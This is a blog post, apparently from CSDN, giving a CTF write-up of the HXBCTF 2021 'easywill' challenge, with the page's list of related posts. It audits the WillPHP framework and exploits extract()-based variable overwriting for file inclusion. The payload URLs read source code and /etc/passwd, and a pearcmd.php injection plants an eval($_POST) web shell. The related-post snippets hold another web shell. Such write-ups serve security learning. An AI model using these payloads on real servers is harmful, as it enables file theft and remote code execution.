[每日一题][HXBCTF 2021]easywill

最新推荐文章于 2022-09-27 20:53:58 发布
最新推荐文章于 2022-09-27 20:53:58 发布
阅读量646 收藏
点赞数 1
分类专栏: 每日一题 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/121386490
版权

笔记

打开页面得到

<?php
namespace home\controller;
class IndexController{
    public function index(){
        highlight_file(__FILE__);
        assign($_GET['name'],$_GET['value']);
        return view();
    }
}

然后显示的是一个WillPHP,还以为是恶搞(我没文化),一查真有这东西,页面给了个函数assign然后return view(),百度了下WillPHP的漏洞,发现没什么东西,怀疑和Thinkphp有关,百度得到assign存在一个文件包含漏洞。百度下载一个willphp2.1的源码看看,首先就查下assign函数

function assign($name, $value = null) {
	\wiphp\View::assign($name, $value);
}

跟进到View.php

namespace wiphp;
require PATH_TPLE.'/Tple.php';
class View {
	private static $_vars = [];
	public static function assign($name, $value = NULL) {
		if ($name != '') self::$_vars[$name] = $value;
	} 
	public static function fetch($file = '', $vars = []) {
		if (!empty($vars)) self::$_vars = array_merge(self::$_vars, $vars);			
		define('__THEME__', C('theme'));
		define('VPATH', (THEME_ON)? PATH_VIEW.'/'.__THEME__ : PATH_VIEW);	
		$path = __MODULE__;
		if ($file == '') {
			$file = __ACTION__;
		} elseif (strpos($file, ':')) {
			list($path,$file) = explode(':', $file);
		} elseif (strpos($file, '/')) {
			$path = '';
		}
		if ($path == '') {
			$vfile = VPATH.'/'.$file.'.html';
		} else {
			$path = strtolower($path);
			$vfile = VPATH.'/'.$path.'/'.$file.'.html';
		}	
		if (!file_exists($vfile)) {
			App::halt($file.' 模板文件不存在。');
		} else {
			define('__RUNTIME__', App::getRuntime());	
			array_walk_recursive(self::$_vars, 'self::_parse_vars'); //处理输出
			\Tple::render($vfile, self::$_vars);
		}		
	}
	//删除反斜杠
	private static function _parse_vars(&$value, $key) {
		$value = stripslashes($value);
	}
}

从assign传入,很容易看出assign中的第一个参数是在模板取值的时候所使用的变量名, 第二个参数是要传递给他的值。
前面都是一些检测,主要关注后面的$vfile,跟进到Tple.php的render和renderTo函数
可以看到renderTo函数

	public static function renderTo($vfile, $_vars = []) {
		$m = strtolower(__MODULE__);
		$cfile = 'view-'.$m.'_'.basename($vfile).'.php';
		if (basename($vfile) == 'jump.html') {
			$cfile = 'view-jump.html.php';
		}
		$cfile = PATH_VIEWC.'/'.$cfile;
		if (APP_DEBUG || !file_exists($cfile) || filemtime($cfile) < filemtime($vfile)) {
			$strs = self::comp(file_get_contents($vfile), $_vars);
			file_put_contents($cfile, $strs);
		}
		extract($_vars);
		include $cfile;
	}

有extract函数和include函数,那么很容易想到可以通过变量覆盖来造成文件包含,和tp的那个洞差不多,下面是include $cfile,那么我们就覆盖cfile这个变量来造成文件包含漏洞

http://d89a5339-dda1-465b-b533-ba369956bab4.node4.buuoj.cn:81/index.php?name=cfile&value=php://filter/read=convert.base64-encode/resource=index.php
或者name=cfile&value=/etc/passwd都能看

但也仅仅只是查看文件而已,并不知道flag在哪,读取日志/var/log/nginx/access.log,尝试一下日志包含,没有成功,应该是被转义了.但是可以利用包含pearcmd.php来getshell,这里我看feng师傅的博客学习的.详情见参考文章。由于buu靶机不出网,就用不出网的姿势

?name=cfile&value=/usr/local/lib/php/pearcmd.php&+-c+/tmp/sapp.php+-d+man_dir=<?eval($_POST[0]);?>+-s+

要记得抓包在bp修改一下<>,然后包含getshell
请添加图片描述
得到flag

参考文章

利用pearcmd.php从LFI到getshell

Sapphire037
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HXBCTF 2021]湖湘杯easywill
weixin_45751765的博客
12-01 3616
0x00 前言 这次接触到pear有点陌生 先本地弄弄 参考师傅 https://blog.csdn.net/rfrder/article/details/121042290 啥是Pear? pear (全称为PHP扩展与应用库) 1.如前所述,PEAR按照一定的分类来管理PEAR应用代码库,你的PEAR代码可以组织到其中适当的目录中,其他的人可以方便地检索并分享到你的成果。 2.PEAR不仅仅是一个代码仓库,它同时也是一个标准,使用这个标准来书写你的PHP代码,将会增强你的程序的可读性,复用性,减少
HXBCTF 2021 easywill
最新发布
m0_64348326的博客
09-04 159
14.操蛋的是这里明显,大小写被转义了,后面才知道需要自己手动修改一下,否则在url框中会被自动转义再发送。为模板开发的一款超轻量级的MVC框架,其中一共源码大小不超过400k,没有繁琐的类库以及冗余的功能函数。同样是两个if不成立,进入最后的变量覆盖加文件包含,这个覆盖的键值对参数。获取到传递参数的md5值文件名,并进行判断是否存在,不成立,跳到else。审计一下,两个参数都为空,那么它就会包含默认的route,就是。函数的作用,它一般是各种框架自定义的一个方法,而大概的用途和。
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
ShenZ的博客
04-18 610
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php中传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
一、WillPHPv2代码审计-[变量覆盖]-[文件包含]-[任意文件读取漏洞]-[pearcmd裸文件包含]
qwsn
12-12 3355
时间戳——2021.12.12 0x01 WP: 第一步:拉去本地代码审计(框架调试) 第二步:调试过程 第三步:在buuctf开启的的环境里获取flag 附:怎么配置phpstorm+phpstudy+xdebug远程调试 注意:配置一个假的远程调试,我们就把源码放到本机(也就是127.0.0.1)的网站根目录WWW下的exp/willphpv2目录下 第一步:访问https://xdebug.org/wizard,把phpinfo的内容贴进去,会返回我们可以使用的对应版本的xdebug 第二
CTF中的pearcmd.php文件包含
qq_52988816的博客
09-27 917
还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。
[HXBCTF 2021]easywill
weixin_43610673的博客
11-17 964
这题index上给的代码很短,需要下载框架源码,自行修改审计。我没找到2.1.5的源码,下了个最新的。这题比赛的时候看了到assign函数还以为是个模板注入的题以为要爆破模板变量名就没去整了。还是对调试这种不太熟吧,下意识不想审计框架的函数调用 下面开始审计,修改app/controller/IndexController.php 的内容与题目给出的一致 先跟踪assign函数 assign只是做一个赋值的作用 传递给view当中 再看view函数 可以看到存在..
[HFCTF 2021 Final]easyflask
weixin_43610673的博客
06-20 1589
任意文件读取,根据提示读取源码 #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type('User', (object,), { 'uname'
[NEWSCTF 2021]easy_web 和 签到
fightte的博客
06-04 633
~ [NEWSCTF 2021]easy_web 和 签到 ~ 之前打了萌新杯,然后就是这样, 题目的质量很高,也得到了很多新的经验 也得到了新的知识,题目是新奇的。 [newsCTF 2021] easy_web 界面: 进入: 就这么多源码: <?php highlight_file("index.php") ?> </div> <div class="content"> <?php
BUUCTF [GXYCTF2019]Ping Ping Ping easywill
m0_62107966的博客
09-24 638
BUUCTF [GXYCTF2019]Ping Ping Ping easywill`ls`即可解释为输出index.php以及flag.php的内容,那么flag就可以输出出来了。cat获取文件内容,过滤了flag,所以flag.php无效,但可以访问index.php,查看源码。发现有两个文件,一个是flag.php,另一个是index.php。考点:ping命令相关命令执行。过滤了很多东西,包括flag。这里过滤了flag和空格。使用ls命令查询目录。
2022虎符线上团队赛 有关web的部分题解(持续更新)
weixin_51458899的博客
03-23 4076
ezphp 可以参考jacko大神的虎符CTF (wolai.com) 题目是与p神之前的博客相似: 我是如何利用环境变量注入执行任意命令 | 离别歌 (leavesongs.com) 可惜题目相同环境不同,刚好此题是上面博客未解答的部分 最终通过查阅资料发现: hxp CTF 2021 - A New Novel LFI - 跳跳糖 (tttang.com) 简单而言就是 fastcgi在处理过大的临时文件时,删除文件没有关闭句柄导致/proc/PID/fd/泄露,于是制造了文件上传的点 关于动态链接库的
长亭php反序列化防护_PHP反序列化笔记
weixin_40006977的博客
12-21 900
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀目录目录private变量与protected变量序列化后的特点序列化后的字段长度前面可以加+题目解题步骤CVE-2016-7124漏洞介绍演示代码题目解题步骤PHP Session 反序列化PHP的3种序列化处理器安全问题当 session.auto_start=Off 时测试Demo题目解题步骤phar反序列化private变量与prot...
Thinkphp6.0 反序列化漏洞
feng的博客
03-12 2013
准备 创建工程: composer create-project topthink/think thinkphp6.0.1 "require": { "php": ">=7.1.0", "topthink/framework": "6.0.1", "topthink/think-orm": "^2.0" }, composer update index控制器: <?php namespace app\controller;
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6243
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
BUUCTF刷题记录(5)
bmth666的博客
01-13 1599
文章目录web[GXYCTF2019]BabyUpload[网鼎杯 2018]Comment web 打ctf(×) 被ctf打(√) [GXYCTF2019]BabyUpload 过滤了htaccess,ph后缀,还限制了<?php,所以只能用: GIF89a <script language="php">@eval($_POST['pass']);</script&gt...
2017swpu-ctf总结
aihuochou9723的博客
11-15 420
2017swpu-ctf总结 今年是我第一次出题感受很多,就分析几道我印象最深刻的题吧 你能进入后台吗? 这道题主要是考察php_screw还有md5加密开启true过后的注入 phpscrew加密在github上有解密工具 工具地址 至于绕过md5($password,true)这个其实主要就是通过md5后的hex值转换成字符串如果包含'or'就导致绕过注入 字符串:ffifdyop满...
ctfshow thinkphp专题
qq_50589021的博客
10-13 643
前言 跟进一步增强php的代码审计能力,了解tp框架 从最基础的开始学习,目的不是为了一把梭,而是要明白它的原理和设计思路,为我们以后自主调试挖洞打下基础 web569——路由 本题使用的版本为3.2.3 ThinkPHP3.2.3完全开发手册-架构-URL模式 入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作: http://serverName/index.php/模块/控制器/操作 这是3.2版本的标准URL格式。 payload
CTF web题 代理相关
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-29 1784
背景 有三虚拟机:虚拟机a、虚拟机service-provider、虚拟机c,我们只能访问虚拟机a的8080端口及其提供的web服务,其中包括访问虚拟机service-provider的代理服务;虚拟机service-provider的web服务没有对外端口,提供访问虚拟机c的代理;虚拟机c没有对外提供服务。 来看虚拟机a的代理服务: // 虚拟机a @PostMapping({"/user"}) public String getUserInfo(HttpServletRequest reques
CTF-06
渗透笔记
01-24 475
题目说明:VLD 1.打开链接,页面如图所示,问我懂不懂VLD 2.查看页面源码,提示index.php.txt文件 3.访问index.php.txt文件,返回的是index.php的操作码 Finding entry points Branch analysis from position: 0 Jump found. Position 1 = 23, Position

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值